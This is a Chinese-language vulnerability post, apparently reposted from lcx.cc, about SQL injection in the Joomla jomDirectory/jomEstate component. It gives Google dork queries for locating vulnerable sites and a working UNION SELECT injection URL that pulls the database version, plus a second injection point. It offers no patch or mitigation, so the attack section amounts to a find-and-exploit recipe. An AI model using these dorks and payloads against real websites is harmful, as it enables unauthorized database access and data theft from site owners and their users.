Joomla jomDirectory SQL注入漏洞

  • A+
所属分类:lcx

    By:追心

漏洞说明:

    jomDirectory提供了不同类型的视图,你可以完全符合你的网站的概念,使经典的目录树结构,编辑或修改文章网页。许多配置选项可以帮助您设置的网站看看,并不需要了解太多代码,Joomla jomDirectory(jomEstate)由于设计上的缺陷,导致sql注入漏洞

官方网站:

    http://www.comdev.eu

漏洞类型:

    sql注入、sql盲注、脚本注入、盲注

谷歌关键词:

    1、inurl:com_jomdirectory
    2、inurl:com_jomestate

漏洞测试:

    1、http://www.xxx.net/home/search?type=-11+union+select+1,2,3,4,version(),6,7,8,9,10,11--
    2、http://www.xxx.net/index.php/component/jomestate/search?district=[SQLi]

文章来源于lcx.cc:Joomla jomDirectory SQL注入漏洞

相关推荐: 【HTml】Html 在网页,页面中显示固定背景图片

Html 在网页、页面中显示固定背景图片: bgproperties="fixed"> 有以下两个参数可以设置: style="background-repeat: no-repeat" //不重复 bgproperties="fixed" //不受滚动…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: